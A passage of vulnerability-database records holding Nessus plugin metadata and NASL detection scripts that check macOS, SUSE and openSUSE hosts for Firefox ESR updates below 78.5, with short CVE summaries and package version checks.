script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-51/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 78.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Version\");\n\n exit(0);\n}\n\ninclude('mozilla_version.inc');\n\nkb_base = 'MacOSX/Firefox';\nget_kb_item_or_exit(kb_base+'/Installed');\n\nversion = get_kb_item_or_exit(kb_base+'/Version', exit_code:1);\npath = get_kb_item_or_exit(kb_base+'/Path', exit_code:1);\n\nis_esr = get_kb_item(kb_base+'/is_esr');\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, 'Mozilla Firefox ESR');\n\nmozilla_check_version(version:version, path:path, product:'firefox', esr:TRUE, fix:'78.5', min:'78.0.0', xss:TRUE, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:42:37", "description": "This update for MozillaFirefox fixes the following issues :\n\nFirefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958: Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966: Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83 and Firefox ESR 78.5\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : MozillaFirefox (SUSE-SU-2020:3458-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo", "p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource", "p-cpe:/a:novell:suse_linux:MozillaFirefox-devel", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-common", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-other", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-3458-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143723", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3458-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143723);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : MozillaFirefox (SUSE-SU-2020:3458-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaFirefox fixes the following issues :\n\nFirefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and\n bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin\n images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without\n displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard\n API)\n\n - CVE-2020-26958: Requests intercepted through\n ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of\n nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP\n Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered\n typed passwords\n\n - CVE-2020-26966: Single-word search queries were also\n broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83\n and Firefox ESR 78.5\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178824\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-15999/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-16012/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26951/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26953/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26956/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26958/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26959/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26960/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26961/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26965/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26966/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-26968/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203458-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a37a871d\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Desktop Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Desktop-Applications-15-SP2-2020-3458=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"MozillaFirefox-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"MozillaFirefox-debuginfo-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"MozillaFirefox-debugsource-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"MozillaFirefox-devel-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"MozillaFirefox-translations-common-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"MozillaFirefox-translations-other-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"MozillaFirefox-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"MozillaFirefox-debuginfo-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"MozillaFirefox-debugsource-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"MozillaFirefox-devel-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"MozillaFirefox-translations-common-78.5.0-8.17.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"MozillaFirefox-translations-other-78.5.0-8.17.1\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:41:41", "description": "This update for MozillaFirefox fixes the following issues :\n\n - Firefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958: Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966: Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83 and Firefox ESR 78.5\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaFirefox (openSUSE-2020-2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-2020.NASL", "href": "https://www.tenable.com/plugins/nessus/143352", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2020.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143352);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (openSUSE-2020-2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaFirefox fixes the following issues :\n\n - Firefox Extended Support Release 78.5.0 ESR\n (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and\n bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin\n images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without\n displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard\n API)\n\n - CVE-2020-26958: Requests intercepted through\n ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of\n nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP\n Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered\n typed passwords\n\n - CVE-2020-26966: Single-word search queries were also\n broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83\n and Firefox ESR 78.5\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178824\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected MozillaFirefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-branding-upstream-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-buildsymbols-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-debuginfo-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-debugsource-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-devel-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-translations-common-78.5.0-lp152.2.30.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"MozillaFirefox-translations-other-78.5.0-lp152.2.30.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / MozillaFirefox-branding-upstream / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T14:41:08", "description": "This update for MozillaFirefox fixes the following issues :\n\n - Firefox Extended Support Release 78.5.0 ESR (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard API)\n\n - CVE-2020-26958: Requests intercepted through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered typed passwords\n\n - CVE-2020-26966: Single-word search queries were also broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83 and Firefox ESR 78.5\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaFirefox (openSUSE-2020-2031)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaFirefox", "p-cpe:/a:novell:opensuse:MozillaFirefox-branding-upstream", "p-cpe:/a:novell:opensuse:MozillaFirefox-buildsymbols", "p-cpe:/a:novell:opensuse:MozillaFirefox-debuginfo", "p-cpe:/a:novell:opensuse:MozillaFirefox-debugsource", "p-cpe:/a:novell:opensuse:MozillaFirefox-devel", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-common", "p-cpe:/a:novell:opensuse:MozillaFirefox-translations-other", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-2031.NASL", "href": "https://www.tenable.com/plugins/nessus/143340", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2031.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143340);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : MozillaFirefox (openSUSE-2020-2031)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaFirefox fixes the following issues :\n\n - Firefox Extended Support Release 78.5.0 ESR\n (bsc#1178824)\n\n - CVE-2020-26951: Parsing mismatches could confuse and\n bypass security sanitizer for chrome privileged code\n\n - CVE-2020-16012: Variable time processing of cross-origin\n images during drawImage calls\n\n - CVE-2020-26953: Fullscreen could be enabled without\n displaying the security UI\n\n - CVE-2020-26956: XSS through paste (manual and clipboard\n API)\n\n - CVE-2020-26958: Requests intercepted through\n ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959: Use-after-free in WebRequestService\n\n - CVE-2020-26960: Potential use-after-free in uses of\n nsTArray\n\n - CVE-2020-15999: Heap buffer overflow in freetype\n\n - CVE-2020-26961: DoH did not filter IPv4 mapped IP\n Addresses\n\n - CVE-2020-26965: Software keyboards may have remembered\n typed passwords\n\n - CVE-2020-26966: Single-word search queries were also\n broadcast to local network\n\n - CVE-2020-26968: Memory safety bugs fixed in Firefox 83\n and Firefox ESR 78.5\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178824\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected MozillaFirefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/26\");\n 